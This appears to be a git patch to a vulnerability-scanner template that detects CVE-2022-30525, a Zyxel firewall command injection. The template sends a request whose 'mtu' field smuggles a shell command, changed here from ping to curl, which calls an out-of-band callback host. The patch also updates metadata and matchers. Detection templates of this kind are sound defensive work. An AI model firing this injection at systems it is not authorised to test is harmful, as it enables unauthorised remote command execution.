From 891e6e48e9dd6d9fd0a50c46acb8cbb5c30b707b Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 13 May 2022 14:16:09 +0530
Subject: [PATCH] Update CVE-2022-30525.yaml

---
 cves/2022/CVE-2022-30525.yaml | 22 +++++++++++++++-------
 1 file changed, 15 insertions(+), 7 deletions(-)

diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml
index 9c9d520a17..359020a92e 100644
--- a/cves/2022/CVE-2022-30525.yaml
+++ b/cves/2022/CVE-2022-30525.yaml
@@ -1,13 +1,16 @@
 id: CVE-2022-30525
 
 info:
-  name: Zyxel Firewall Unauthenticated RCE
-  author: h1ei1
+  name: Zyxel Firewall - Unauthenticated RCE
+  author: h1ei1,prajiteshsingh
   severity: critical
-  description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on .
+  description: |
+    The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
   reference:
-    - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
-  tags: rce,Zyxel,cve,cve2022
+    - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
+    - https://github.com/rapid7/metasploit-framework/pull/16563
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+  tags: rce,zyxel,cve,cve2022,firewall,unauth
 
 requests:
   - raw:
@@ -16,10 +19,15 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"}
+        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
 
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
-          - "dns"
+          - "http"
+
+      - type: status
+        status:
+          - 500